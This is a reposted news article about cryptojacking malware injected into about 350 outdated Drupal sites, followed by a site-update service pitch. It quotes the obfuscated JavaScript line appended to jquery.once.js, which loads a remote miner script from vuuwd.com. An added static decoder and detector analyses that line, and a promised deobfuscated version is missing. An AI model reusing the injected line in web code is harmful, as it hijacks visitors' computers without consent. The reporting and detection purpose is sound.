An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.
The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.
Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.
“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.
The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64') ; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);
Which, deobfuscated, translates to:
The domain it calls, vuuwd.com, is down.
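The decoding can be reproduced statically, without ever running the injected line. The following is an added example, not code from the article or from Mursch's report: it decodes the \xNN escapes in the line quoted above, prints the readable form, and reports the remote script it would load. The function names and the "suspicious" heuristic are assumptions of this example.

```javascript
// Added example: static decoding only; the injected line is never executed.
// SAMPLE is the injected line quoted in the article, kept as inert raw text.
const SAMPLE = [
  String.raw`var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64') ; `,
  String.raw`var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); `,
  String.raw`ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';`,
  String.raw`ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);`,
].join('');

// A single- or double-quoted JS string literal, honouring backslash escapes.
const STRING_LITERAL = /(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
const HEX_OR_UNICODE = /\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g;

// Turn \xNN and \uNNNN escapes back into the characters they encode.
function decodeEscapes(body) {
  return body.replace(HEX_OR_UNICODE, (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Rewrite every string literal in readable form so a reviewer sees the real code.
function deobfuscate(source) {
  return source.replace(STRING_LITERAL, (_, quote, body) => JSON.stringify(decodeEscapes(body)));
}

// Summarise what the snippet would do, judged only from its decoded literals.
function analyze(source) {
  const literals = [...source.matchAll(STRING_LITERAL)].map(m => decodeEscapes(m[2]));
  const escapedChars = (source.match(HEX_OR_UNICODE) || []).join('').length;
  const has = name => literals.includes(name);
  const report = {
    escapeRatio: escapedChars / source.length, // share of the text that is escapes
    remoteUrls: literals.filter(s => /^(?:https?:)?\/\//i.test(s)),
    buildsScriptTag: has('createElement') && has('script') && has('appendChild'),
  };
  // Heuristic (assumption of this example): mostly escapes, injects a <script>,
  // and the script source is a remote URL.
  report.suspicious = report.escapeRatio > 0.5 && report.buildsScriptTag
    && report.remoteUrls.length > 0;
  return report;
}

console.log(deobfuscate(SAMPLE));
console.log(analyze(SAMPLE));
```

Running analyze() over the contents of each .js file under a Drupal docroot (for example the end of jquery.once.js) flags appended lines of this shape for manual review.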
BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.
“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.
[Article taken from: https://techcrunch.com/2018/05/09/outdated-website-software-lets-hackers-mine-cryptocurrencies-at-your-expense/]
If you need help updating your Drupal 7 site to the latest version to protect against this hack, drop me a message.
To find out if your site is being used for mining, visit this website to check: https://whoismining.com